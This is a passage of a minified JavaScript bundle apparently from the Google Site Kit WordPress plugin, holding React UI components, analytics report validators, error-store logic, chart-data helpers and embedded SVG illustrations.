DAgMCAwIDAgMCAwIDAgMTI3IDAiIHJlc3VsdD0iaGFyZEFscGhhIi8+CjxmZU9mZnNldCBkeT0iMi4xMzMzMyIvPgo8ZmVHYXVzc2lhbkJsdXIgc3RkRGV2aWF0aW9uPSI0LjI2NjY3Ii8+CjxmZUNvbXBvc2l0ZSBpbjI9ImhhcmRBbHBoYSIgb3BlcmF0b3I9Im91dCIvPgo8ZmVDb2xvck1hdHJpeCB0eXBlPSJtYXRyaXgiIHZhbHVlcz0iMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMC4xNSAwIi8+CjxmZUJsZW5kIG1vZGU9Im5vcm1hbCIgaW4yPSJCYWNrZ3JvdW5kSW1hZ2VGaXgiIHJlc3VsdD0iZWZmZWN0MV9kcm9wU2hhZG93XzI3MDVfMTc2MzMiLz4KPGZlQmxlbmQgbW9kZT0ibm9ybWFsIiBpbj0iU291cmNlR3JhcGhpYyIgaW4yPSJlZmZlY3QxX2Ryb3BTaGFkb3dfMjcwNV8xNzYzMyIgcmVzdWx0PSJzaGFwZSIvPgo8L2ZpbHRlcj4KPC9kZWZzPgo8L3N2Zz4K";var y=i(62540);const A={INFO:"info",ERROR:"error",WARNING:"warning"};function BannerNotification({notificationID:e,type:t=A.INFO,learnMoreLink:i,dismissButton:a,ctaButton:o,gaTrackingEventArgs:n,...g}){const u=(0,c.A)(e,n?.category),{dismissNotification:m}=(0,r.useDispatch)(l.D);let M=g?.svg;return M||t===A.INFO||(M={desktop:void 0,mobile:void 0,verticalPosition:"center"},t===A.WARNING&&(M.desktop=I),t===A.ERROR&&(M.desktop=h)),(0,y.jsx)("div",{className:s()("googlesitekit-banner-notification",`googlesitekit-banner-notification--${t}`),children:(0,y.jsx)(p.xA,{className:"googlesitekit-page-content",children:(0,y.jsx)(p.fI,{children:(0,y.jsx)(p.fh,{size:12,children:(0,y.jsx)(d.A,{learnMoreLink:i&&{...i,onClick:async function(e){u.clickLearnMore(n?.label,n?.value),await(i?.onClick?.(e))}},dismissButton:a&&{...a,onClick:async function(t){await(a?.onClick?.(t)),u.dismiss(n?.label,n?.value),m(e,{...a?.dismissOptions})}},ctaButton:o&&{...o,onClick:async function(t){u.confirm(n?.label,n?.value),await(o?.onClick?.(t)),o?.dismissOnClick&&m(e,{...o?.dismissOptions})}},svg:M,...g})})})})})}BannerNotification.propTypes={notificationID:n().string.isRequired,type:n().oneOf(Object.values(A)),titleIcon:n().node,title:n().string,description:n().oneOfType([n().string,n().node]),learnMoreLink:n().shape(g.A.propTypes),dismissButton:n().shape(m.A.propTypes),ctaButton:n().shape(u.A.propTypes),gaTrackingEventArgs:n().shape({category:n().string,label:n().string,value:n().number})}},67526:(e,t,i)=>{"use strict";i.d(t,{A:()=>UseSnippetSwitch});var a=i(62688),s=i.n(a),o=i(63696),n=i(82871),r=i(50539),l=i(49383),c=i(80),d=i(6109),g=i(62659),u=i(62540);function UseSnippetSwitch({description:e}){const t=(0,g.A)(),i=(0,r.useSelect)(e=>e(c.K9).getUseSnippet()),{setUseSnippet:a}=(0,r.useDispatch)(c.K9),s=(0,o.useCallback)(()=>{const e=!i;a(e),(0,d.sx)(`${t}_analytics`,e?"enable_tag":"disable_tag","ga4")},[i,a,t]);return void 0===i?null:(0,u.jsxs)("div",{className:"googlesitekit-analytics-usesnippet",children:[(0,u.jsx)(l.Switch,{label:(0,n.__)("Place Google Analytics code","google-site-kit"),checked:i,onClick:s,hideLabel:!1}),e]})}UseSnippetSwitch.propTypes={description:s().node}},68728:(e,t,i)=>{"use strict";i.d(t,{DZ:()=>T,RL:()=>f,SG:()=>N,Sw:()=>u,TF:()=>A,Uv:()=>p,X_:()=>o,Yb:()=>d,ZT:()=>n,bF:()=>c,dL:()=>h,f8:()=>a,gV:()=>r,iP:()=>s,k:()=>I,oC:()=>y,pJ:()=>l,uP:()=>g,um:()=>M,ze:()=>m});const a="disapproved",s="graylisted",o="pending",n="approved",r="needs-attention",l="ready",c="client-requires-review",d="client-getting-ready",g="none",u="multiple",m="no-client",p="added",I="needs-attention",h="requires-review",y="getting-ready",A="ready",M="ready-no-auto-ads",N="none",f=[a,s,o,n];function T(e){return e===s||e===o}},68761:(e,t,i)=>{"use strict";i.d(t,{A:()=>n});var a=i(63696),s=i(62659),o=i(6109);function n(e,t,{viewAction:i="view_notification",confirmAction:n="confirm_notification",dismissAction:r="dismiss_notification",clickLearnMoreAction:l="click_learn_more_link"}={}){const c=(0,s.A)(),d=null!=t?t:`${c}_${e}`;return{view:(0,a.useCallback)((...e)=>(0,o.sx)(d,i,...e),[d,i]),confirm:(0,a.useCallback)((...e)=>(0,o.sx)(d,n,...e),[d,n]),dismiss:(0,a.useCallback)((...e)=>(0,o.sx)(d,r,...e),[d,r]),clickLearnMore:(0,a.useCallback)((...e)=>(0,o.sx)(d,l,...e),[d,l])}}},68832:(e,t,i)=>{"use strict";i.d(t,{A:()=>o});var a=i(35470),s=i(11999);function o(e,t){return(0,a.A)(i=>{const{getValue:a}=i(s.s);return a(e,t)},[e,t])}},69908:(e,t,i)=>{"use strict";i.r(t),i.d(t,{AREA_ENTITY_DASHBOARD_CONTENT_PRIMARY:()=>d,AREA_ENTITY_DASHBOARD_MONETIZATION_PRIMARY:()=>u,AREA_ENTITY_DASHBOARD_SPEED_PRIMARY:()=>g,AREA_ENTITY_DASHBOARD_TRAFFIC_PRIMARY:()=>c,AREA_MAIN_DASHBOARD_CONTENT_PRIMARY:()=>n,AREA_MAIN_DASHBOARD_KEY_METRICS_PRIMARY:()=>a,AREA_MAIN_DASHBOARD_MONETIZATION_PRIMARY:()=>l,AREA_MAIN_DASHBOARD_SPEED_PRIMARY:()=>r,AREA_MAIN_DASHBOARD_TRAFFIC_AUDIENCE_SEGMENTATION:()=>o,AREA_MAIN_DASHBOARD_TRAFFIC_PRIMARY:()=>s,default:()=>m});const a="mainDashboardKeyMetricsPrimary",s="mainDashboardTrafficPrimary",o="mainDashboardTrafficAudienceSegmentation",n="mainDashboardContentPrimary",r="mainDashboardSpeedPrimary",l="mainDashboardMonetizationPrimary",c="entityDashboardTrafficPrimary",d="entityDashboardContentPrimary",g="entityDashboardSpeedPrimary",u="entityDashboardMonetizationPrimary",m={AREA_MAIN_DASHBOARD_KEY_METRICS_PRIMARY:a,AREA_MAIN_DASHBOARD_TRAFFIC_PRIMARY:s,AREA_MAIN_DASHBOARD_CONTENT_PRIMARY:n,AREA_MAIN_DASHBOARD_SPEED_PRIMARY:r,AREA_MAIN_DASHBOARD_MONETIZATION_PRIMARY:l,AREA_ENTITY_DASHBOARD_TRAFFIC_PRIMARY:c,AREA_ENTITY_DASHBOARD_CONTENT_PRIMARY:d,AREA_ENTITY_DASHBOARD_SPEED_PRIMARY:g,AREA_ENTITY_DASHBOARD_MONETIZATION_PRIMARY:u}},70301:(e,t,i)=>{"use strict";i.d(t,{M:()=>a});const a="core/location"},70670:(e,t,i)=>{"use strict";i.d(t,{EW:()=>y,HX:()=>r.x6,Hl:()=>u,OS:()=>p,RE:()=>M,Xo:()=>A,Ze:()=>N,dQ:()=>I,mh:()=>m,uv:()=>h,yZ:()=>g});var a=i(32091),s=i.n(a),o=i(17243),n=i(80),r=i(6109),l=i(73730),c=i(65379),d=i(25427);function g(e){return e===n.ZC||(0,r.x6)(e)}function u(e){return"string"==typeof e&&/^\d+$/.test(e)}function m(e){return e===n.to||u(e)}function p(e){return"string"==typeof e&&/^\d+$/.test(e)}function I(e){return e===n.Oh||p(e)}function h(e){return"string"==typeof e&&e.trim().length>0}function y(e){return"string"==typeof e&&/^G-[a-zA-Z0-9]+$/.test(e)}function A(e){return"string"==typeof e&&/^(G|GT|AW)-[a-zA-Z0-9]+$/.test(e)}function M(e){s()((0,o.isPlainObject)(e),"options for Analytics 4 report must be an object."),s()((0,l.O5)(e),"Either date range or start/end dates must be provided for Analytics 4 report.");const{metrics:t,dimensions:i,dimensionFilters:a,metricFilters:n,orderby:r}=(0,c.A)(e);s()(t.length,"Requests must specify at least one metric for an Analytics 4 report."),s()((0,d.Ig)(t),'metrics for an Analytics 4 report must be either a string, an array of strings, an object, an array of objects, or a mix of strings and objects. Objects must have a "name" property. Metric names must match the expression ^[a-zA-Z0-9_]+$.'),i&&s()((0,d.a2)(i),'dimensions for an Analytics 4 report must be either a string, an array of strings, an object, an array of objects, or a mix of strings and objects. Objects must have a "name" property.'),a&&s()((0,d.wA)(a),"dimensionFilters for an Analytics 4 report must be a map of dimension names as keys and dimension values as values."),n&&s()((0,d.Q3)(n),"metricFilters for an Analytics 4 report must be a map of metric names as keys and filter value(s) as numeric fields, depending on the filterType."),r&&s()((0,d.G4)(r),'orderby for an Analytics 4 report must be an array of OrderBy objects where each object should have either a "metric" or "dimension" property, and an optional "desc" property.')}function N(e){const t=["displayName","description","membershipDurationDays","eventTrigger","exclusionDurationMode","filterClauses"];s()((0,o.isPlainObject)(e),"Audience must be an object."),Object.keys(e).forEach(e=>{s()(t.includes(e),`Audience object must contain only valid keys. Invalid key: "${e}"`)}),["displayName","description","membershipDurationDays","filterClauses"].forEach(t=>{s()(e[t],`Audience object must contain required keys. Missing key: "${t}"`)}),s()((0,o.isArray)(e.filterClauses),"filterClauses must be an array with AudienceFilterClause objects.")}},71189:(e,t,i)=>{"use strict";i.d(t,{A:()=>CTAButton});var a=i(62688),s=i.n(a),o=i(49383),n=i(83366),r=i(62540);function CTAButton({label:e,ariaLabel:t,disabled:i,inProgress:a,onClick:s,href:l,external:c=!1,hideExternalIndicator:d=!1}){if(!e||!s&&!l)return null;let g;return c&&!d&&(g=(0,r.jsx)(n.A,{width:14,height:14})),(0,r.jsx)(o.SpinnerButton,{className:"googlesitekit-banner__cta","aria-label":t,disabled:i||a,isSaving:a,onClick:s,href:l,target:c?"_blank":void 0,trailingIcon:g,children:e})}CTAButton.propTypes={label:s().string,ariaLabel:s().string,disabled:s().bool,inProgress:s().bool,onClick:s().func,href:s().string,dismissOnClick:s().bool,dismissOptions:s().shape({expiresInSeconds:s().number,skipHidingFromQueue:s().bool})}},71264:(e,t,i)=>{"use strict";i.d(t,{Ay:()=>TourTooltips,R0:()=>I,ei:()=>y});var a=i(15844),s=i(36703),o=i(62688),n=i.n(o),r=i(82871),l=i(50539),c=i(7972),d=i(97345),g=i(65054),u=i(83202),m=i(62659),p=i(62540);const I={options:{arrowColor:"#3c7251",backgroundColor:"#3c7251",overlayColor:"rgba(0, 0, 0, 0.6)",textColor:"#fff",zIndex:2e4},spotlight:{border:"2px solid #3c7251",backgroundColor:"#fff"}},h={back:(0,r.__)("Back","google-site-kit"),close:(0,r.__)("Close","google-site-kit"),last:(0,r.__)("Got it","google-site-kit"),next:(0,r.__)("Next","google-site-kit")},y={disableAnimation:!0,styles:{arrow:{length:8,margin:56,spread:16},floater:{filter:"drop-shadow(rgba(60, 64, 67, 0.3) 0px 1px 2px) drop-shadow(rgba(60, 64, 67, 0.15) 0px 2px 6px)"}}},A={VIEW:"feature_tooltip_view",NEXT:"feature_tooltip_advance",PREV:"feature_tooltip_return",DISMISS:"feature_tooltip_dismiss",COMPLETE:"feature_tooltip_complete"};function TourTooltips({steps:e,tourID:t,gaEventCategory:o,isRepeatable:n,callback:r}){const M=`${t}-step`,N=`${t}-run`,{setValue:f}=(0,l.useDispatch)(c.n),{dismissTour:T,receiveCurrentTour:S}=(0,l.useDispatch)(d.oR),k=(0,l.useRegistry)(),j=(0,m.A)(),v=(0,l.useSelect)(e=>e(c.n).getValue(M)||0),b=(0,l.useSelect)(e=>e(c.n).getValue(N)&&!1===e(d.oR).isTourDismissed(t));(0,a.A)(function(){i.g.document.body.classList.add("googlesitekit-showing-feature-tour",`googlesitekit-showing-feature-tour--${t}`),f(N,!0)});const _=e.map(e=>({disableBeacon:!0,isFixed:!0,placement:"auto",...e}));return(0,p.jsx)(s.Ay,{callback:function(e){!function({index:e,action:t,lifecycle:i,size:a,status:n,type:r}){const l=e+1,c="function"==typeof o?o(j):o;r===s.qY.TOOLTIP&&i===s.VD.TOOLTIP?(0,g.sx)(c,A.VIEW,l):t===s.kl.CLOSE&&i===s.VD.COMPLETE?(0,g.sx)(c,A.DISMISS,l):t===s.kl.NEXT&&n===s.XQ.FINISHED&&r===s.qY.TOUR_END&&a===l&&(0,g.sx)(c,A.COMPLETE,l),i===s.VD.COMPLETE&&n!==s.XQ.FINISHED&&(t===s.kl.PREV&&(0,g.sx)(c,A.PREV,l),t===s.kl.NEXT&&(0,g.sx)(c,A.NEXT,l))}(e);const{action:a,index:l,status:c,step:d,type:u}=e,m=a===s.kl.CLOSE,p=!m&&[s.qY.STEP_AFTER,s.qY.TARGET_NOT_FOUND].includes(u),I=[s.XQ.FINISHED,s.XQ.SKIPPED].includes(c),h=m&&u===s.qY.STEP_AFTER,y=I||h;if(s.qY.STEP_BEFORE===u){let e=d.target;"string"==typeof d.target&&(e=i.g.document.querySelector(d.target)),e?.scrollIntoView?.({block:"center"})}p?function(e,t){f(M,e+(t===s.kl.PREV?-1:1))}(l,a):y&&(i.g.document.body.classList.remove("googlesitekit-showing-feature-tour",`googlesitekit-showing-feature-tour--${t}`),n?(f(N,!1),f(M,null),S(null)):T(t)),r&&r(e,k)},floaterProps:y,locale:h,run:b,stepIndex:v,steps:_,styles:I,tooltipComponent:u.A,continuous:!0,disableOverlayClose:!0,disableScrolling:!0,showProgress:!0})}TourTooltips.propTypes={steps:n().arrayOf(n().object).isRequired,tourID:n().string.isRequired,gaEventCategory:n().oneOfType([n().string,n().func]).isRequired,isRepeatable:n().bool,callback:n().func}},72545:(e,t,i)=>{"use strict";i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var a,s=i(63696);function o(){return o=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},o.apply(null,arguments)}const __WEBPACK_DEFAULT_EXPORT__=e=>s.createElement("svg",o({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 14 14"},e),a||(a=s.createElement("path",{fill:"currentColor",d:"M14 1.41 12.59 0 7 5.59 1.41 0 0 1.41 5.59 7 0 12.59 1.41 14 7 8.41 12.59 14 14 12.59 8.41 7z"})))},73198:(e,t,i)=>{"use strict";i.d(t,{A:()=>ErrorNotice});var a=i(62688),s=i.n(a),o=i(63696),n=i(82871),r=i(84024),l=i(50539),c=i(13137),d=i(25797),g=i(6109),u=i(62540);function ErrorNotice({className:e,error:t,hasButton:i=!1,storeName:a,message:s=t.message,noPrefix:m=!1,skipRetryMessage:p,hideIcon:I=!1}){const h=(0,l.useDispatch)(),y=(0,l.useSelect)(e=>a?e(a).getSelectorDataForError(t):null),A=(0,o.useCallback)(()=>{h(y.storeName).invalidateResolution(y.name,y.args)},[h,y]);if(!s||(0,c.G)(t))return null;const M=i&&(0,c.vl)(t,y);let N=s;i||p||(N=(0,n.sprintf)(/* translators: %s: Error message from Google API. */ /* translators: %s: Error message from Google API. */ (0,n.__)("%s (Please try again.)","google-site-kit"),N)),m||(N=(0,n.sprintf)(/* translators: $%s: Error message */ /* translators: $%s: Error message */ (0,n.__)("Error: %s","google-site-kit"),N));const f=t?.data?.reconnectURL;f&&(0,r.m)(f)&&(N=(0,n.sprintf)(/* translators: 1: Original error message 2: Reconnect URL */ /* translators: 1: Original error message 2: Reconnect URL */ (0,n.__)('%1$s To fix this, <a href="%2$s">redo the plugin setup</a>.',"google-site-kit"),N,f));return(0,u.jsx)(d.A,{className:e,type:d.A.TYPES.ERROR,description:(0,u.jsx)("span",{dangerouslySetInnerHTML:(0,g.p9)(N,{ALLOWED_TAGS:["a"],ALLOWED_ATTR:["href"]})}),ctaButton:M?{label:(0,n.__)("Retry","google-site-kit"),onClick:A}:void 0,hideIcon:I})}ErrorNotice.propTypes={className:s().string,error:s().shape({message:s().string}),hasButton:s().bool,storeName:s().string,message:s().string,noPrefix:s().bool,skipRetryMessage:s().bool,hideIcon:s().bool}},73730:(e,t,i)=>{"use strict";function a(e,t,i=()=>!0){return"string"==typeof e?i(e):!("object"!=typeof e||!t(e))||!!Array.isArray(e)&&e.every(e=>"string"==typeof e?i(e):"object"==typeof e&&t(e))}function s({startDate:e,endDate:t}){const i=e&&e.match(/^\d{4}-\d{2}-\d{2}$/),a=t&&t.match(/^\d{4}-\d{2}-\d{2}$/);return i&&a}function o(e){function t(e){const t=e.hasOwnProperty("fieldName")&&!!e.fieldName,i=e.hasOwnProperty("sortOrder")&&/(ASCENDING|DESCENDING)/i.test(e.sortOrder.toString());return t&&i}return Array.isArray(e)?e.every(e=>"object"==typeof e&&t(e)):"object"==typeof e&&t(e)}function n(e){return"string"==typeof e||!!Array.isArray(e)&&e.every(e=>"string"==typeof e)}i.d(t,{G4:()=>o,O5:()=>s,cX:()=>a,cq:()=>n})},73866:(e,t,i)=>{"use strict";i.d(t,{g4:()=>I,o1:()=>p});var a=i(78913),s=i(32091),o=i.n(s),n=i(10523),r=i.n(n),l=i(6109),c=i(50539);const d="RECEIVE_ERROR",g="CLEAR_ERROR",u="CLEAR_ERRORS";function m(e,t){if(t&&Array.isArray(t)){const i=t.map(e=>"object"==typeof e?(0,l.Zm)(e):e);return`${e}::${r()(JSON.stringify(i))}`}return e}const p={receiveError:(e,t,i=[])=>(o()(e,"error is required."),o()(t,"baseName is required."),o()(i&&Array.isArray(i),"args must be an array."),{type:d,payload:{error:e,baseName:t,args:i}}),clearError:(e,t=[])=>(o()(e,"baseName is required."),o()(t&&Array.isArray(t),"args must be an array."),{type:g,payload:{baseName:e,args:t}}),clearErrors:e=>({type:u,payload:{baseName:e}})};function I(e){o()(e,"storeName must be defined.");const t=(0,c.createReducer)((e,{type:t,payload:i})=>{switch(t){case d:{const{baseName:t,args:a,error:s}=i,o=m(t,a);e.errors=e.errors||{},e.errorArgs=e.errorArgs||{},e.errors[o]=s,e.errorArgs[o]=a;break}case g:{const{baseName:t,args:a}=i,s=m(t,a);e.errors=e.errors||{},e.errorArgs=e.errorArgs||{},delete e.errors[s],delete e.errorArgs[s];break}case u:{const{baseName:t}=i;if(t){e.errors=e.errors||{},e.errorArgs=e.errorArgs||{};for(const i in e.errors)(i===t||i.startsWith(`${t}::`))&&(delete e.errors[i],delete e.errorArgs[i])}else e.errors={},e.errorArgs={};break}}}),i={getErrorForSelector:(e,t,a=[])=>(o()(t,"selectorName is required."),i.getError(e,t,a)),getErrorForAction:(e,t,a=[])=>(o()(t,"actionName is required."),i.getError(e,t,a)),getError(e,t,i){const{errors:a}=e;return o()(t,"baseName is required."),a[m(t,i)]},getErrors(e){const t=new Set(Object.values(e.errors));return Array.from(t)},getMetaDataForError(e,t){const i=Object.keys(e.errors).find(i=>e.errors[i]===t);if(i){return{baseName:i.substring(0,i.indexOf("::")),args:e.errorArgs[i]}}return null},getSelectorDataForError:(0,a.N)(t=>function(i,a){const s=t(e).getMetaDataForError(a);if(s){const{baseName:i,args:a}=s;if(!!t(e)[i])return{storeName:e,name:i,args:a}}return null}),hasErrors:e=>i.getErrors(e).length>0};return{initialState:{errors:{},errorArgs:{}},actions:p,controls:{},reducer:t,resolvers:{},selectors:i}}},73881:(e,t,i)=>{"use strict";i.d(t,{A:()=>a});const a="data:image/svg+xml;base64,<svg width="508" height="267" viewBox="0 0 508 267" fill="none" xmlns="http://www.w3.org/2000/svg">
<g clip-path="url(#clip0_1461_10576)">
<path d="M533.989 216.243C508.281 269.978 439.587 270.556 401.442 262.371C351.678 251.693 318.647 212.634 275.2 210.16C231.754 207.685 207.532 230.288 160.714 235.937C113.895 241.585 56.4747 236.45 26.6922 178.425C-3.09028 120.401 17.4493 58.9763 70.339 28.1923C123.229 -2.59178 155.317 28.3483 207.532 28.1923C259.747 28.0363 280.854 -18.5909 329.431 -22.3701C353.544 -24.246 377.842 -19.286 401.961 -2.59177C425.816 13.9196 429.312 44.1389 488.699 72.2556C548.086 100.372 559.697 162.508 533.989 216.243Z" fill="#B8E6CA"/>
<g filter="url(#filter0_d_1461_10576)">
<rect x="267" y="58.876" width="136.122" height="74.2484" rx="9.0748" fill="white"/>
</g>
<rect x="280.2" y="72.0751" width="20.6246" height="6.59986" rx="3.29993" fill="#EBEEF0"/>
<rect x="280.2" y="86.1003" width="41.2491" height="16.4996" rx="8.24982" fill="#FFDED3"/>
<rect x="280.2" y="114.974" width="109.723" height="6.59986" rx="3.29993" fill="#EBEEF0"/>
<path d="M287.622 91.8752L293.062 97.3147M293.062 97.3147L293.122 93.0236M293.062 97.3147L288.771 97.3751" stroke="white" stroke-width="1.23747" stroke-linecap="round" stroke-linejoin="round"/>
<rect x="298.35" y="91.8752" width="16.4996" height="4.94989" rx="1.64996" fill="white"/>
<g filter="url(#filter1_d_1461_10576)">
<rect x="117" y="145" width="136.122" height="74.2484" rx="9.0748" fill="white"/>
</g>
<rect x="130" y="158" width="54" height="7" rx="3.29993" fill="#EBEEF0"/>
<rect x="130.2" y="172.224" width="41.2491" height="16.4996" rx="8.24982" fill="#FFDED3"/>
<rect x="130.2" y="201.098" width="109.723" height="6.59986" rx="3.29993" fill="#EBEEF0"/>
<path d="M137.622 177.999L143.062 183.439M143.062 183.439L143.122 179.148M143.062 183.439L138.771 183.499" stroke="white" stroke-width="1.23747" stroke-linecap="round" stroke-linejoin="round"/>
<rect x="148.35" y="177.999" width="16.4996" height="4.94989" rx="1.64996" fill="white"/>
<g filter="url(#filter2_d_1461_10576)">
<rect x="117" y="58.876" width="136.122" height="74.2484" rx="9.0748" fill="white"/>
</g>
<rect x="130.199" y="72.0751" width="86.6231" height="6.59986" rx="3.29993" fill="#EBEEF0"/>
<rect x="130.199" y="86.1003" width="41.2491" height="16.4996" rx="8.24982" fill="#B8E6CA"/>
<rect x="130.199" y="114.974" width="109.723" height="6.59986" rx="3.29993" fill="#EBEEF0"/>
<path d="M137.625 97.3751L143.064 91.9357M143.064 91.9357L138.773 91.8752M143.064 91.9357L143.125 96.2268" stroke="white" stroke-width="1.23747" stroke-linecap="round" stroke-linejoin="round"/>
<rect x="148.35" y="91.8752" width="16.4996" height="4.94989" rx="1.64996" fill="white"/>
<g filter="url(#filter3_d_1461_10576)">
<rect x="267" y="145" width="136.122" height="74.2484" rx="9.0748" fill="white"/>
</g>
<rect x="280.199" y="158.199" width="52.7989" height="6.59986" rx="3.29993" fill="#EBEEF0"/>
<path d="M280.199 180.474C280.199 175.918 283.893 172.224 288.449 172.224H313.199C317.755 172.224 321.448 175.918 321.448 180.474C321.448 185.03 317.755 188.724 313.199 188.724H288.449C283.893 188.724 280.199 185.03 280.199 180.474Z" fill="#B8E6CA"/>
<rect x="280.199" y="201.098" width="109.723" height="6.59986" rx="3.29993" fill="#EBEEF0"/>
<path d="M287.624 183.499L293.063 178.06M293.063 178.06L288.772 177.999M293.063 178.06L293.124 182.351" stroke="white" stroke-width="1.23747" stroke-linecap="round" stroke-linejoin="round"/>
<rect x="298.35" y="177.999" width="16.4996" height="4.94989" rx="1.64996" fill="white"/>
</g>
<defs>
<filter id="filter0_d_1461_10576" x="253.8" y="48.9762" width="162.522" height="100.648" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0" result="hardAlpha"/>
<feOffset dy="3.29993"/>
<feGaussianBlur stdDeviation="6.59986"/>
<feComposite in2="hardAlpha" operator="out"/>
<feColorMatrix type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"/>
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow_1461_10576"/>
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow_1461_10576" result="shape"/>
</filter>
<filter id="filter1_d_1461_10576" x="103.8" y="135.1" width="162.522" height="100.648" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0" result="hardAlpha"/>
<feOffset dy="3.29993"/>
<feGaussianBlur stdDeviation="6.59986"/>
<feComposite in2="hardAlpha" operator="out"/>
<feColorMatrix type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"/>
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow_1461_10576"/>
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow_1461_10576" result="shape"/>
</filter>
<filter id="filter2_d_1461_10576" x="103.8" y="48.9762" width="162.522" height="100.648" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0" result="hardAlpha"/>
<feOffset dy="3.29993"/>
<feGaussianBlur stdDeviation="6.59986"/>
<feComposite in2="hardAlpha" operator="out"/>
<feColorMatrix type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"/>
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow_1461_10576"/>
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow_1461_10576" result="shape"/>
</filter>
<filter id="filter3_d_1461_10576" x="253.8" y="135.1" width="162.522" height="100.648" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0" result="hardAlpha"/>
<feOffset dy="3.29993"/>
<feGaussianBlur stdDeviation="6.59986"/>
<feComposite in2="hardAlpha" operator="out"/>
<feColorMatrix type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"/>
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow_1461_10576"/>
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow_1461_10576" result="shape"/>
</filter>
<clipPath id="clip0_1461_10576">
<rect width="508" height="267" fill="white"/>
</clipPath>
</defs>
</svg>
"},74426:(e,t,i)=>{"use strict";function a(e){return e.charAt(0).toUpperCase()+e.slice(1)}function s(e){return e.replace(/([a-z0-9]{1})([A-Z]{1})/g,"$1_$2").toUpperCase()}function o(e){return e.split("-").map(e=>e.charAt(0).toUpperCase()+e.slice(1)).join("")}i.d(t,{Uf:()=>o,m2:()=>a,sP:()=>s})},74508:(e,t,i)=>{"use strict";i.d(t,{s:()=>m});var a=i(4452),s=i.n(a),o=i(17243),n=i(82871),r=i(49746),l=i(6109),c=i(32091),d=i.n(c);var g=i(9616);function u(e,t){const i=[];return e.forEach(e=>{if(!e.metricValues)return;const{value:a}=e.metricValues[t],s=e.dimensionValues[0].value,o=(0,g.A)(s);i.push([o,a])}),i}function m(e,t,i,a,c=[(0,n.__)("Users","google-site-kit"),(0,n.__)("Sessions","google-site-kit"),(0,n.__)("Engagement Rate","google-site-kit"),(0,n.__)("Session Duration","google-site-kit")],g=[e=>parseFloat(e).toLocaleString(),e=>parseFloat(e).toLocaleString(),e=>(0,l.Eo)(e/100,{style:"percent",signDisplay:"never",maximumFractionDigits:2}),e=>(0,l.Eo)(e,"s")],m=[o.identity,o.identity,e=>100*e,o.identity]){const p=[...e?.rows||[]],I=p.length;if(2*i>I){const e=(0,l.XH)(a);for(let t=0;i>t;t++){const i=(e.getMonth()+1).toString(),a=e.getDate().toString(),s=e.getFullYear().toString()+(2>i.length?"0":"")+i+(2>a.length?"0":"")+a;if(t>I){const e=[{dimensionValues:[{value:s},{value:"date_range_0"}],metricValues:[{value:0},{value:0}]},{dimensionValues:[{value:s},{value:"date_range_1"}],metricValues:[{value:0},{value:0}]}];p.unshift(...e)}e.setDate(e.getDate()-1)}p.push({dimensionValues:[{value:"0"},{value:"date_range_0"}]},{dimensionValues:[{value:"0"},{value:"date_range_1"}]})}const h=c[t]===(0,n.__)("Session Duration","google-site-kit"),y=h?"timeofday":"number",A=[[{type:"date",label:(0,n.__)("Day","google-site-kit")},{type:"string",role:"tooltip",p:{html:!0}},{type:y,label:c[t]},{type:y,label:(0,n.__)("Previous period","google-site-kit")}]],{compareRange:M,currentRange:N}=function(e,{dateRangeLength:t}){function i(t){return e.filter(({dimensionValues:[,e]})=>e.value===t)}d()(Array.isArray(e),"report must be an array to partition."),d()(Number.isInteger(t)&&t>0,"dateRangeLength must be a positive integer.");const a=-1*t;return{currentRange:i("date_range_0").slice(a),compareRange:i("date_range_1").slice(2*a,a)}}(p,{dateRangeLength:i}),f=u(N,t),T=u(M,t),S=(0,r.JK)(),k={weekday:"short",month:"short",day:"numeric"};return f.forEach((e,i)=>{if(!e[0]||!e[1]||!T[i])return;const a=m[t],o=a(e[1]),r=a(T[i][1]),d=parseFloat(r),u=(0,l.Cn)(o,d),p=(0,l.vY)(u),I=(0,n.sprintf)(/* translators: 1: date for user stats, 2: previous date for user stats comparison */ /* translators: 1: date for user stats, 2: previous date for user stats comparison */ (0,n._x)("%1$s vs %2$s","Date range for chart tooltip","google-site-kit"),e[0].toLocaleDateString(S,k),T[i][0].toLocaleDateString(S,k)),y=(0,n.sprintf)(/* translators: 1: selected stat label, 2: numeric value of selected stat, 3: up or down arrow , 4: different change in percentage */ /* translators: 1: selected stat label, 2: numeric value of selected stat, 3: up or down arrow , 4: different change in percentage */ (0,n._x)("%1$s: <strong>%2$s</strong> <em>%3$s %4$s</em>","Stat information for chart 